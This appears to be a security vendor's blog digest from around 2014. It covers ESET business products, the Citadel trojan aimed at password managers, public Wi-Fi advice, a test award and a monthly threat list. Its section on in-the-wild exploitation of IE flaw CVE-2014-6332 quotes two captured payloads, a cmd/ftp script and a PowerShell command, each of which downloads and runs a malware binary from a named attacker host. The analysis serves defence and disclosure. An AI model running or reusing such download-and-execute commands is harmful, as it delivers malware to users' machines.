Brand new security offering from ESET wins accolades from reviewers


Sobering statistics on the cost of cybercrime published by the InfoSec Institute last year says that the average annual cost of cybercrime increased by 26% over the previous year to $11.56 million USD, ranging from $1.3 million to $58 million per organization. The report also highlights that recovery and detection as the most costly internal activities. According to Annual global survey of EY, over 37% of companies have no real-time insight on cyber risks, lacking agility. They also lack budget and skills to combat rising cybercrime.

ESET conducted in depth interviews with customers and IT professionals around the world to learn more about today’s and tomorrow’s business requirements. These findings are at the heart of ESET’s complete reengineering and redesign of its business products to provide the best protection while lowering the demands on the IT teams.

At the core of this new product range is ESET’s all-new remote management console, ESET Remote Administrator. With an improved user experience, a new-look GUI, and seamless functionality, customers can drill down into the smallest details, adjust settings with equal granularity and monitor and control their business’ IT security status via a web console.

This new suite of ESET products boasts a wealth of other features:

  • Mobile protection without need for additional MDM tools;
  • Flexible report creation to keep stakeholders up to date with the latest IT security information;
  • Full regulatory compliance and hassle-free audits for regulatory bodies;
  • Easy migration for businesses wanting to protect their business with ESET’s award-winning technology.
  • A single unilicense to protect all supported platforms

The new Endpoint solutions come with a number of new protection technologies like an improved Anti-Phishing, Exploit Blocker, Vulnerability Shield and Advanced Memory Scanner, which are already very well established within ESET IT security line of products for Home users. In the latest AV-Comparatives Anti-Phishing test, ESET scored at the top of the ranking, providing the most comprehensive phishing protection of all tested products.

“After developing the world’s top security products for over two decades we decided on revolution rather than evolution in our product design and architecture. Using our decades-long experience and industry-leading expertise, and by performing extensive research among our current and future clients, we are now delivering our new, robust and unified business product portfolio,” said Richard Marko, Chief Executive Officer at ESET. “Small businesses and large enterprises require solutions that provide the best user experience and the highest level of protection. ESET’s new business products can handle simple and complex network configurations, and local or global operations, including multi-lingual environments, while delivering the highest performance and effectiveness.”

ESET NOD32 technology has an unbeaten record when it comes to malware detection – with 87 consecutive VB100 awards for detection of ‘in-the-wild’ threats, more than any other IT security product vendor. ESET products have unbroken record of VB100 test for over 11 years.

“ESET’s products have a superb record in our comparatives stretching back many years, with reliably excellent performances in test after test,” said John Hawes, Chief of Operations at Virus Bulletin. “Their commitment to quality shines through in every aspect of their products, from the attractive and highly usable interface design on the surface to rock-solid stability, low impact on system performance and of course dependable protection from the full spectrum of threats facing our devices and data.”

Testimonials from the first users who tried the all new ESET security solutions for businesses confirm security boasting efficiency and effectiveness:

“ESET delivers everything you need in an anti-malware package: great detection rates, small footprint and centralized management. This, combined with the expert support and training the company provides, makes ESET our chosen supplier for protecting our customers’ systems.” Andy M., Managing Director of Miller Solutions, UK

“The Remote Administrator Console made installing ESET over the network simple. The pre-defined policies enabled the set up to work ‘out of the box’, with only a few tweaks needed to reflect our network infrastructure and specific needs.” Gareth L., ESET business customer, United Kingdom


‘Citadel’ trojan attacking password managers

Using password managers is often recommended as good practice in order to prevent overusing the same logins, but a new malware has been uncovered that specifically targets the password managers that hold all the variants.

Neowin reports that the malware – named ‘Citadel’ – is “highly evasive”, and can lay dormant on infected computers for “an indefinite amount of time”, to be awoken by a specific user action, meaning that most people will be blissfully unaware that their computer has been compromised. It has allegedly already infected ‘millions’ of computers.

Ars Technica reports that a configuration file had been modified to get the Citadel trojan to begin keylogging when an infected computer opens either Password Safe or KeePass. The Register claims that the neXus Personal Security Client has also been targeted.

The malware works by “injecting itself into explorer.exe processes and hooking into APIs.” It then downloads a configuration file from a central server.

The discovery was made by IBM Trusteer, and the company’s director of enterprise security, Dana Tamir, told Ars Technica that the extent of the attacks is currently limited, but that a focus on password managers could become a more common method of attack. “Once the malware captures this master key, then they can use that master key to exercise complete control over the machine and any of the user’s online accounts,” Tamir explained.

“I think that password managers and authentication solutions are more critical than ever. But it is important to keep in mind that these solutions are not sufficient in and of themselves—they have to be accessed from a clean machine,” she added.

The configuration file suggests that the attackers were using a ‘legitimate web server’ as the command-and-control server, but the files were removed from the server by the time researchers discovered it, so at this point the identity of who is behind the attacks remains a mystery.

First exploitation of Internet Explorer ‘Unicorn bug’ in-the-wild

Microsoft released a patch last week for a critical vulnerability allowing remote code execution in Internet Explorer. This vulnerability, known as CVE-2014-6332, and discovered by an IBM X-Force security researcher, is significant because it exploits an old bug present in Internet Explorer versions 3 through 11. This means that most, if not all, Internet Explorer users are vulnerable unless they are using patched systems. It gets worse: the vulnerability not only can be used by an attacker to run arbitrary code on a remote machine, but it can also bypass the Enhanced Protected Mode (EPM) sandbox in IE11 as well as Microsoft’s free anti-exploitation tool, the Enhanced Mitigation Experience Toolkit (EMET).

Earlier this week, a proof-of-concept (PoC) successfully exploiting this vulnerability on Internet Explorer was made publicly available. In fact, this PoC showed that arbitrary code could be run on a machine merely by visiting a specially crafted website, if using an unpatched version of Internet Explorer. It was thus only a matter of time before we started seeing this vulnerability actively used as part of a cybercriminal campaign. Scouring our data, we found several blocked exploitation attempts while our users were browsing a major Bulgarian website. As you might have guessed, the compromised website was using CVE-2014-6332 to install malware on the computers of its unsuspecting visitors.

Compromised Website details

This news agency website, ranked among the 50 most visited websites in Bulgaria and among the 11,000 first worldwide according to Alexa, might just be part of the first significant in-the-wild use of this vulnerability. As far as we can tell, there is only one page on the website that has been compromised and is serving this exploit, possibly indicating a testing phase. The page is about some TV Reality show winners.


The page source contains an invisible HTML iframe pointing to the exploit:


As seen above, the exploit is hosted on the domain natmasla[.]ru. It is detected by ESET as Win32/Exploit.CVE-2014-6332.A.

The exploit is based on proof-of-concept code published by a Chinese researcher. Here are the credits in this original proof-of-concept:





It is easily modifiable and allows the attacker to write the payload in VBScript.

Strangely, the exploit is actually present two times consecutively. The first time, the payload is:

cd %TEMP%&
@echo open>%TEMP%\KdFKkDls.txt&
@echo [REDACTED]>>%TEMP%\KdFKkDls.txt&
@echo binary>>%TEMP%\KdFKkDls.txt&
@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! del natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo bye>>%TEMP%\KdFKkDls.txt&
ftp -s:%TEMP%\KdFKkDls.txt&
del %TEMP%\KdFKkDls.txt

It is basically a series of commands that will be executed in the context of cmd.exe. The first group, prefixed by @echo, will write the commands in a text file (“KdFKkDls.txt”, but the name is different each time one pulls the exploit). Then the file is passed to the ftp command. It will connect to an ftp server with a username/password, download a binary, and execute it.
In the second case, the payload is:

powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘hxxp://natmasla[.]ru/ath/sploit/natmasla.exe’,’%TEMP%\natmasla.exe’);(New-Object -com Shell.Application).ShellExecute(‘%TEMP%\natmasla.exe’)

This time it uses PowerShell to download a binary payload, which is actually the same as the one downloaded by the first payload.During our investigation we observed some network difficulties when we tried to fetch the exploit. That could be the reason for the two payloads with different network resources.
The downloaded binary is detected by ESET as Win32/IRCBot.NHR. This malware has numerous capabilities, as launching DDoS attacks, or opening remote shells for the miscreants. As a funny fact, it contains an Einstein’s citation “Anyone who has never made a mistake has never tried anything new.”


Although we were not able to link this particular incident to a known exploit kit, it is a matter of time before mainstream kits integrate this vulnerability. Since all supported versions of Windows were vulnerable to this exploit before the patch was released last week, we can expect this vulnerability conversion rate to be very high. If you haven’t updated Internet Explorer yet, please take time do it right now through Windows Update.

WhatsApp gets tough on security

The popular messaging service WhatsApp has stepped up security for users of its consumer messaging service by adopting end-to-end encryption.

In what represents the largest rollout of this level of encryption in any messaging system worldwide, according to the BBC, WhatsApp integrated Open Whisper Systems’ TextSecure software – which will be turned on by default for Android users – with WhatsApp’s iOS consumers to follow suit. Although in an Open Whisper blog post, the suggestion was that the team still ‘have a ways to go until all mobile platforms are fully supported, but we are moving quickly towards a world where all WhatsApp users will get end-to-end encryption by default.”

What makes this end-to-end solution so exciting is that no decrypting of messages is done over the air or via the messaging service’s servers. It’s all done on the device as it sends and receives messages, meaning not even WhatsApp itself can access your private messages. In addition to this, the encryption supports asynchronous data transfers, so even if the recipient is not online, the encryption still functions properly even when the message’s recipient is offline.

In addition, each message uses a one-time message decryption key. Even if someone managed to hack one message, the same key would not be usable to decode other messages, as reported by The Register.

That said, Open Whisper were quick to point out that,”The WhatsApp Android client does not yet support encrypted messaging for group chat or media messages, but we’ll be rolling out support for those next…’

WhatsApp has somewhere in the region of 600 million active users, making it the most popular messaging tool by some margin in most of the world’s major territories.

Public Wi-Fi hotspots – know the risks

Using public Wi-Fi can be risky – and security experts such as Europol’s Troels Oerting have even suggested it’s TOO risky, and that we should abandon public Wi-Fi hotspots altogether.

If your computer happens to be filled with trade secrets (or any business data for that matter), that’s probably a good idea – your colleagues will appreciate your waiting until you are somewhere you can connect securely.

Earlier this year, Oerting, the head of Europe’s Europol Cyber Crime division, warned that free hotspots were increasingly used to steal private information from consumers in Europe, as reported by We Live Security here. Oerting said, “We have seen an increase in the misuse of Wi-Fi in order to steal information, identity or passwords and money from the users who use public or insecure wi-fi connections.”

Up to 10% of workers admit to using public hotspots with work machines, according to a recent survey by phone insurer ProtectYourBubble.

For ordinary PC and smartphone users, Wi-Fi is not ideal – but it’s sometimes near-inescapable.

ESET Researcher Stephen Cobb says in a how-to for computing on the go,

“Consider using a 3G or 4G hotspot instead of hotel Internet or free public Wi-Fi hotspots. If you are logging into a work network, use a VPN, and do not visit banking or shopping sites.”

Frequent travellers might find it cheaper to buy a local SIM card for data – or share a 3G or 4G data connection from a smart device.

But if you are travelling somewhere where cellphone reception is poor, these steps will help you get online as safely as possible.

Double-check the network before you use it

Public Wi-Fi hotspots - know the risks

The worst thing you can do is assume a Wi-Fi network is legitimate – or run by the establishment you’re in. It might be a decoy deployed by a criminal.

As a general rule, don’t connect to any network called, ‘Free Wi-Fi’ – if they’re advertising that, they may well want you to sign up for a newsletter or endure adverts, even if the hotspot isn’t malicious.

Mark James, ESET Security Specialist, says, “If it’s a public service (coffee shop, McDonalds etc.) check the WiFi name with a member of staff – don’t just connect to the first one you see, it could be there to harvest your information.”

It’s probably safer NOT to check email and Facebook on your cellphone

Once you’ve reassured yourself that the hotspot is legitimate, you probably want to check email messages – this is best done via your PC, as you can use the browser’s secure icon (usually a lock or similar in your address bar) to check that you are connected securely (ie via HTTPS).

Hackers who are monitoring network traffic are looking for you to type in passwords – email acount ones, social network passwords.

Mark James, ESET Security Specialist says, ‘I would personally limit my activities to anything that does not require a username and password to log in, but please bear in mind most apps on your smartphone will auto login. Generally browsing and information look-ups are going to be fairly safe.’

Overall, smartphones come a poor second to PCs or Macs when it comes to public Wi-Fi hotspots – the ‘defenses’ built into PC browsers make it easier to reassure yourself you’re being safe.

Using email apps on your phone can leak data – a secure HTTPS website is better, ESET’s Mark James says.

“For email, it’s better to use a secure HTTPS website for emails rather than using pop3 from your mobile, as this is easily interrogated using free apps on the same WiFi connection.” If you’re sending corporate email, or sensitive emails, it’s best to use encryption (a more detailed We Live Security how-to offers tips here).

What not to say in public Wi-Fi hotspots

Public Wi-Fi hotspots - know the risks 2

Typically, attacks on Wi-Fi hotspots are ‘man-in-the-middle’ attacks – where an attacker is able to access your data as it travels.

That means anything financial or corporate is out – don’t type in your credit card details, don’t buy anything, don’t visit your bank’s website.

If you have to connect to your work environment, use a VPN – otherwise, wait until you’re in a safer environment.

Prepare yourself first

If you’re going to use your computer in a risky environment, ensure sharing is switched off – you don’t want unknown attackers having access to your files.

On a Mac, you’ll find this under Sharing Preferences.

On a PC your homegroup and sharing settings will vary according to your OS.

Set all your websites to ‘secure’ before you log on

Most web services will offer the option to enable HTTPS – secure browsing – by default. It’s sensible to ensure that you’ve activated this on services you’re going to use frequently.

HTTPS helps ensure that a browser is connecting to what it thinks it is. The Electronic Frontier Foundation offers a plug-in which forces your browser to connect via HTTPS where possible.

Many services – such as Google Mail – do this by default, but others which don’t default to the more secure setting will offer an option to enable it. Find it in your accounts ‘Settings’ menu and enable it.

What CAN you do?

Travelers will be on safe ground researching information, or checking news sites, or looking at maps of the local area – but anything financial, such as booking a hotel, is best done either via your mobile device’s connection, or just over the phone.

When to say, ‘No’ to a hotspot

Public Wi-Fi hotspots - know the risks 3

In remote areas, or certain countries in the Far East, it’s perfectly normal to encounter Wi-Fi networks with no security whatsoever – in most cases, this is simply for ease of use, as guests are constantly traveling through the hotel or bar, or cafe.

Don’t connect to these hotspots, ESET’s Mark James warns: “If someone is snooping your data you will NOT know they are doing it.”

Forget the hotspot when you leave

Even big chain Wi-Fi Hotspots pose risks – and the last thing you want is your smart device attempting to connect to the same hotspot later, when you’re not looking.

Smart devices can give away a surprising amount of data from apps connecting to remote servers – so it’s always a good policy to police your list of ‘known’ networks thoroughly

The worst of these can be Hotspot networks which your cellphone provider has a deal with – which phones will sometimes default to connecting to, without alerting the user, as reported by We Live Security here.

The report found that the two services allowed smartphones to reconnect to public Wi-Fi hotspots automatically, which could leave users vulnerable to fake hotspots with the right name, able to redirect users to bogus websites to harvest usernames and passwords.

Ars Technica’s IT editor Sean Gallagher writes that the services open both Android and iPhone to a serious security threat, saying, “There’s a much bigger threat to your security than somebody randomly fishing for you to connect to them—the networks you’ve already connected to and trusted, like AT&T and Xfinity.”

ESET awarded highest score in AV-Comparatives Performance Test


ESET received highest scores for its latest product release of ESET Smart Security in the latest AV-Comparatives Performance Test.

Published yesterday, AV-Comparatives awarded the new version of ESET Smart Security with the Advanced+ Award. Details of the test show that ESET achieved the highest score for performance, outperforming all contenders, including AVG, Avira, BitDefender, F-Secure, Kaspersky, McAfee and Sophos, and Trend Micro.

AV-Comparatives focused on testing the impact that security software can have on system performance when specific tasks, such as downloading, opening, copying, encoding and archiving files, as well as installing and launching applications, are performed.

AV-Comparatives has used several own test cases and PC Mark Tests, an industry-recognized performance test. The award is based on AV-Comparative’s  assessment of the overall impact results with default settings under Windows 8.1 64-Bit.

During the whole year ESET showed an excellent performance in all of our tests. As well as ESET is very good in protecting the customer, it showed that it has nearly no impact on the speed of the computer also in the latest performance test,“ said Andreas Clementi, CEO at AV-Comparatives.

ESET Smart Security delivers multiple layers of Internet protection and keeps your identity safe with Anti-Theft, Personal Firewall and Anti-Phishing. This ESET security suite boasts brand new technology such as Botnet Protection that protects against infiltration by botnet malware as well as Enhanced Exploit Blocker that blocks attacks specifically designed to evade antivirus detection.

“We are really pleased with this award,” said Ignacio Sbampato, Chief Sales and Marketing Officer at ESET. “Offering stellar protection against today’s threats is an absolute must for any security vendor, but doing so with absolute minimum system impact is an art, which – done well – makes a huge difference to customers.”

Read the full AV-Comparatives report or learn more about ESET Smart Security.


Monthly Threat Report: October 2014


The Top Ten Threats


1. HTML/Refresh
Previous Ranking: 1
Percentage Detected: 3.66%

HTML/Refresh is a Trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.


2. Win32/Bundpil
Previous Ranking: 2
Percentage Detected: 2.24%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address from which it tries to download several files. The files are then executed and HTTP protocol is used for comunication with the C&C to receive new commands. The worm may delete the following folders:



3. JS/Kryptik.I
Previous Ranking: 3
Percentage Detected: 2.17%

JS/Kryptik is a generic detection of malicious obfuscated JavaScript code embedded in HTML pages; it usually redirects the browser to a malicious URL or implements a specific exploit.


4. Win32/RiskWare.NetFilter
Previous Ranking: 5
Percentage Detected: 1.49%

Win32/RiskWare.NetFilter is an application that includes malicious code designed to force infected computers to allow an attacker to remotely connect to the infected system and control it, in order to steal sensitive information or install other malware.


5. Win32/Adware.MultiPlug
Previous Ranking: 4
Percentage Detected: 1.47%

Win32/Adware.Multiplug is a Possible Unwanted Application that once it’s present into the users system might cause applications to displays advertising popup windows during internet browsing.


6. HTML/ScrInject
Previous Ranking: n/a
Percentage Detected: 1.45%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.


7. LNK/Agent.AK
Previous Ranking: 6
Percentage Detected: 1.40%

LNK/Agent.AK is a link that concatenates commands to execute legitimate code while running the threat code in the background. It is similar in its effect to the older autorun.inf type of threat. This vulnerability became known at the time of discovery of Stuxnet, as it was one of four vulnerabilities that were executed by Stuxnet variants.


8. Win32/Sality
Previous Ranking: 7
Percentage Detected: 1.34%

Sality is a polymorphic file infector. When executed it starts a service and created/deleted registry keys related to security applications activite in the system and to ensure that the malicious process restarts at each reboot of operating system. It modifies EXE and SCR files and disables services and processes implemented by and associated with security solutions.
More information relating to a specific signature:


9. HTML/Iframe
Previous Ranking: 8
Percentage Detected: 1.24%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.


10. INF/Autorun
Previous Ranking: 10
Percentage Detected: 1.22%
INF/Autorun is a generic detection of versions of the autorun.inf configuration file created by malware. The malicious AUTORUN.INF file contains the path to the malware executable. This file is usually dropped into the root folder of all the available drives in an attempt to autorun a malware executable when the infected drive is mounted. The AUTORUN.INF file(s) may have the System (S) and Hidden (H) attributes present in an attempt to hide the file from Windows Explorer.



Get every new post delivered to your Inbox.

Join 78 other followers